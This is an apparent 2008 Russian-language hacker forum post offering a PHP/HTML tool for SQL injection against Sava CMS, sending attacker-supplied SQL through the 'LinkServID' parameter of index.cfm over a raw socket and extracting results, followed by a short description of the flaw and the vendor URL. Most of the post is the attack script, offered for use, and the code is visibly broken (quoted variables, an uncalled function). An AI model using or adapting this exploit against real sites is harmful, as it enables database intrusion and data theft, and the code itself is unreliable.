Sava CMS SQL-Inj Exploit.

Discussion in 'Веб-уязвимости' started by КВР, 25 May 2008.

  1. КВР

    КВР Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    16
    Likes Received:
    30
    Reputations:
    -2
    Sava CMS SQL-Inj Exploit.
    PHP:
     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
    <title>Sava CMS SQL-Inj Exploit.</title>
    <style type="text/css">
    <!--
    body {color: #EAFFC3;background-color:#615e5f;}
    a:hover {color:#CC0033;}
    a{color:#148044;text-decoration:none;}
    a.pages{color:#FFFFFF;}
    -->
    </style></head>
    <form name="addnews" action="" method="post">
    <table border=1>
    <tr>
        <td>aname:<input name="$name" type="text" value=""></td>
        <td>comand:<input name="$comand" type="text" value=""></td>
    <?
    // Web-Defence.ru
     
    $name='';
     
    $comand='';
     echo 
    "<pre>\n";  
     @
    set_time_limit(0);  
     @
    ini_set("display_errors","0");  
     
    $hostname gethostbyname('$name');  
     function 
    loadfile($loadfile)  
     {  
      global 
    $hostname;  
      
    $responce "";  
      
    $fsock    fsockopen($hostname,80,$errnum,$errstr,2);  
      
    $headers  "GET http://$name/index.cfm?LinkServID=$comand&showMeta=0 HTTP/1.1\n";  
      
    $headers .= "Host: $name\n";  
      
    $headers .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2\n";  
      
    $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";  
      
    $headers .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\n";  
      
    $headers .= "Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7\n";  
      
    $headers .= "Keep-Alive: 500\n";  
      
    $headers .= "Connection: close\n";  
      
    $headers .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
      
    fwrite   ($fsock,$headers);  
      while    (!
    feof($fsock)) $responce .= fread($fsock,1024);   
      
    fclose   ($fsock);  
     
    $patern "#<[\s]*sqlinj[\s]*>([^<]*)<[\s]*/sqlinj[\s]*>#i";  
     if(
    preg_match($patern$responce$rez)) echo $rez[1]; else echo 'Something not right...';  
    //echo $responce;  
    }  
    echo 
    "</pre>";  
    ?>
    Уязвимость существует из-за недостаточной обработки входных данных в параметре "LinkServID" в сценарии index.cfm. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
    URL производителя: gosava.com/go/sava/
     
    #1 КВР, 25 May 2008
    Last edited: 25 May 2008